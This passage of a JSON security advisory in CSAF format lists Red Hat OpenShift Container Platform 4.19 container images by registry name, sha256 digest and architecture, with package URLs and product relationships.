"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3Ace9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3A083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3Aaa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3Adbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Ad17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3Adbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Aceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Aff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Ae4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
